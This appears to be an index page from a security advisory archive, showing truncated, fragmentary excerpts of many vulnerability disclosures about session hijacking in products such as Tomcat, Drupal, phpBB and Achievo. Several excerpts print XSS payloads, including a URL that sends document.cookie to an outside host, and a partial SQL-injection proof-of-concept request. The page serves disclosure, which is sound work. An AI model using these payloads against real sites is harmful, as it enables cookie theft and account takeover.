Next Page >>
session hijacking
When handling 'update' action, 'default_comment_display' is the only parameter that isn't sanitized with
mysql_real_escape_string(), this can be exploited to inject arbitrary SQL code. Because of this is a multiple
lines query and latest version of MySQL doesn't allow to start comment with /* no followed by a */, sometimes
It's impossible to alter the 'users' table content for e.g. changing the admin's password, but is still
possible to inject a subquery to fetch for e.g. the session id of admin for a Session Hijacking attack.
This is a proof of concept request:
POST /wikka/UserSettings HTTP/1.1
Host: localhost
Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
SecureWorks Security Advisory SWRX-2009-002
McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability
Advisory Information
Title: McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability
Advisory ID: SWRX-2009-002
==========================================
2Wire Broadband Router Session Hijacking Vulnerability
==========================================
1. OVERVIEW
The 2Wire Broadband Router is vulnerable to Session Hijacking flaw
which attackers can compromise the router administrator session.
* System affected => [ 'Apache Axis <= 1.5' ]
* Release date: => [ '24 June 2010' ]
* Impact => [ 'Successful exploitation of this vulnerability may
lead to remote administrative interface to accept a Session Hijacking' ]
Axis2 [1] claims to be a Web Services / SOAP / WSDL engine, the
successor to the widely used Apache Axis SOAP stack. Nowadays, there are
two implementations of the Apache Axis2 Web services engine - Apache
Synopsis
========
Multiple vulnerabilities in Tomcat may lead to local file overwriting,
session hijacking or information disclosure.
Background
==========
Tomcat is the Apache Jakarta Project's official implementation of Java
Product link: http://www.orangehrm.com/
2. Vulnerability Information
Class: Cross site scripting, SQL injection, PHP code injection, Cross-site
request forgery
Impact: Session hijacking, unauthorized data access, privilege escalation,
user-assisted arbitrary command execution
Rating: Less critical
Remotely Exploitable: Yes
Locally Exploitable: No
2. Profile information (user, email, Real Name) is not filtered. For example a user could use something like "<script>alert(document.cookie)</script> " as a Real name and the script would execute everytime someone views that users profile or the members page.
However the number of characters allowed in Real name is limited so it's unlikely too much damage could be done.
If XSS is allowed, it could allow for Session Hijacking.
I found this bug using version 6.1 of NSSboard (the latest as of this writing), and it's likely that all earlier versions are also affected, but I didn't test them. I am using Debian Linux and lighttpd to host it.
The fix would be to make sure HTML tags are filtered regardless of BBcode being enabled, and to filter user profile input data.
http://www-01.ibm.com/software/data/cognos/products/cognos-8-business-intell
igence/capabilities.html
2. Vulnerability Information
Class: Cross site scripting
Impact: Session hijacking
Rating: Less critical
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: N/A
2. http://www.website.tld/achievo/dispatch.php?atknodetype=pim.pim&atkaction=<script>alert(document.cookie)</script>
Explained: The above has greater impact as it will survive a login. This is not filtered as well. This works only when One IS logged in.
Additional Information:
If: $config_session_regenerate = false; is set to 'true' in the config.inc.php then the session id's will be regenerated on each hit/click preventing session hijacking.
-:: Solution ::-
The most easy solution is to validate user input and strip or convert bad / html characters. Setting the above to true might solve the issue partially, however session hijacking is only one of the things you can do with cross site scripting.
Changelog: 2008/08/29
Summary: Introduction
Blind SQL Injection
Insecure SQL Password Usage
Admin Session Hijacking
Deep Recursion Protection Bypass
Code Execution
Miscellanious
Risk level: Medium / High
Manager web applications allow remote authenticated users to inject
arbitrary web script or HTML (CVE-2007-2450).
Tomcat treated single quotes as delimiters in cookies, which could
cause sensitive information such as session IDs to be leaked and allow
remote attackers to conduct session hijacking attacks (CVE-2007-3382).
Tomcat did not properly handle the " character sequence in a cookie
value, which could cause sensitive information such as session IDs
to be leaked and allow remote attackers to conduct session hijacking
attacks (CVE-2007-3385).
The vulnerability allows an local low privileged user account to
inject/implement malicious persistent script codes on application
side.
Successful exploitation of the vulnerability can result in session
hijacking or content request manipulation.
Vulnerable Module(s): (Persistent)
[+] Userdata Form allows
[+] Group Administration & Track ID
[+] User Password CSRF + Reset
Security Risk
=============
It is possible to manipulate administrator interface cookies, which may be used to impersonate a legitimate user, allowing the attacker to view or alter user records, and to perform transactions as that user.
The Cookie variable can be set to a malicious and arbitrary value which can lead to session hijacking and privilege escalation attack.
Possible Causes
===============
Insecure web application programming or configuration
Introduction:
=============
The SonicWall NSA 4500 web admin interface offers the option of customize some web pages directly from the admin interface. For this, the web interface has some forms where the admin can put the code and test it via a preview feature. This preview feature will show the page and execute all the javascript code inside it in the web admin security context, wich leads to many traditional attacks, like XSS, session hijacking...
Report-Timeline:
================
Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0
through 4.1.36 does not properly handle (1) double quote (") characters
or (2) \%5C (encoded backslash) sequences in a cookie value, which
might cause sensitive information such as session IDs to be leaked
to remote attackers and enable session hijacking attacks. NOTE:
this issue exists because of an incomplete fix for CVE-2007-3385
(CVE-2007-5333).
Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through
6.0.18, and possibly earlier versions normalizes the target pathname
Security Risk
=============
It is possible to manipulate administrator interface cookies, which may be used to impersonate a legitimate user, allowing the attacker to view or alter user records, and to perform transactions as that user.
The Cookie variable can be set to a malicious and arbitrary value which can lead to session hijacking and privilege escalation attack.
Possible Causes
===============
Insecure web application programming or configuration
========
1.1
Multiple persistent input validation vulnerabilities are detected on the famous Content Papst v2011.2 Content Management System.
The vulnerability allows an remote attacker or local low privileged cp user account to inject own malicious script codes on
application side (persistent) of the web service. Successful exploitation of the vulnerability can result in persistent module
content manipulation of vulnerable modules, phishing & session hijacking.
Vulnerable Module(s):
[+] Categorie => Titel/Beschreibung/Permalink
[+] Links => Titel/URL/Beschreibung
[+] Artikel-Categorie => Titel/Beschreibung/Permalink
Advisory Title: Lotus Notes Memory Mapped Files Vulnerability
Author: Ollie Whitehouse / ollie_whitehouse@symantec.com
Release Date: 23-10-2007
Application: Lotus Notes / Domino
Platform: Microsoft Windows
Severity: Session hijacking in shared user environments
/ Data leakage in shared user environments
Vendor status: Updated Application Versions Available
CVE Number: CVE-2007-5544
Reference: http://www.securityfocus.com/bid/26146
drupal: Session hijacking vulnerability, CVE-2008-3661
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3661
http://int21.de/cve/CVE-2008-3661-drupal.html
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
Description
menalto gallery: Session hijacking vulnerability, CVE-2008-3102
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3102
http://int21.de/cve/CVE-2008-3102-mantis.html
http://www.mantisbt.org/bugs/view.php?id=9524
http://www.mantisbt.org/bugs/view.php?id=9533
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
The vulnerability exists due to the “/gwtTeaming.rpc” code not properly sanitizing user input into the “What Are You Working On?” or Micro Blog entry field. Also, the application fails to encode the output allowing for the execution of the script.
Tested on: Cent OS 5.5 (kernel 2.6.18-194), MySQL Version 14.12 Distribution 5.0.77, and Novell Vibe 3 BETA OnPrem.
Affected software versions: Vibe 3 BETA OnPrem
Impact: Any user who can view another user’s Micro Blog entry is vulnerable to this XSS attack. Successful exploitation of this vulnerability could result in session cookie theft, session hijacking, URL redirection, and possible operating system code execution on the targeted victim’s host.
Fixed in: Fixed in the final shipping version of Novell Vibe OnPrem 3
Remediation guidelines: Update to the final shipping version of Novell Vibe OnPrem 3
#2009-004 AjaxTerm session id collision
Description:
AjaxTerm, an open source web based terminal, uses a form of random session id
generation which can lead to remote session hijacking.
The ajaxterm.js script allocates session ids on the client side using the
following method:
var sid=""+Math.round(Math.random()*1000000000);
Alert box injection -
http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script>
Cookie theft (could be used in session hijacking attacks) -
http://target-domain.com/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>location="http://procheckup.com/?"%2bdocument.cookie</script>
or partially obfuscated -
(/surgemail) allows remote attackers to inject arbitrary web script or HTML.
Input passed to the "username_ex" parameter is not properly sanitised before
being returned to the user, therefore enabling the execution of arbitrary
script code in a user's browser session, which can lead to cookie theft and
session hijacking.
The vulnerability is confirmed to exist in version 4.3e (latest version at
the date of vulnerability discovery). Previous versions may also be vulnerable.
Exploit
Synopsis
========
Multiple vulnerabilities have been found in Asterisk allowing for SQL
injection, session hijacking and unauthorized usage.
Background
==========
Asterisk is an open source telephony engine and tool kit.
Squirrelmail: Session hijacking vulnerability, CVE-2008-3663
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3663
http://int21.de/cve/CVE-2008-3663-squirrelmail.html
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
Description
Brief Description: Collaboration relies on distributed systems that
provide the required security properties. Virtual organizations often
use the Internet to support collaboration. The Internet, operating
systems and distributed environments currently suffer from poor
security support and cannot resist common attacks (spamming, worms,
session hijacking, buffer overflow, denial of service, social
engineering, etc.). Collaborative organizations require better
security properties (strong authentication, efficient encryption,
Mandatory Access Control, integrity, non-repudiation and
availability). Nowadays, collaborative organizations use new
technologies such as mobile devices, smartcards, wireless networks,
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
phpBB 2.0.23 Session Hijacking Vulnerability +
found by NBBN 13 Mar 2008 +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
::Information about this vulnerabilty
If a moderator or an admin close a thread in phpBB 2.0.X, the sessionid
is sending with GET:
Joomla: Session hijacking vulnerability, CVE-2008-4122
References
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4122
http://int21.de/cve/CVE-2008-4122-joomla.html
http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/
https://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
Description
archive, applet, or Java Web Start application, possibly resulting in
the execution of arbitrary code with the privileges of the user running
the application. Furthermore, a remote attacker could cause a Denial of
Service affecting multiple services via several vectors, disclose
information and memory contents, write or execute local files, conduct
session hijacking attacks via GIFAR files, steal cookies, bypass the
same-origin policy, load untrusted JAR files, establish network
connections to arbitrary hosts and posts via several vectors, modify
the list of supported graphics configurations, bypass HMAC-based
authentication systems, escalate privileges via several vectors and
cause applet code to be executed with older, possibly vulnerable
Next Page>>
|
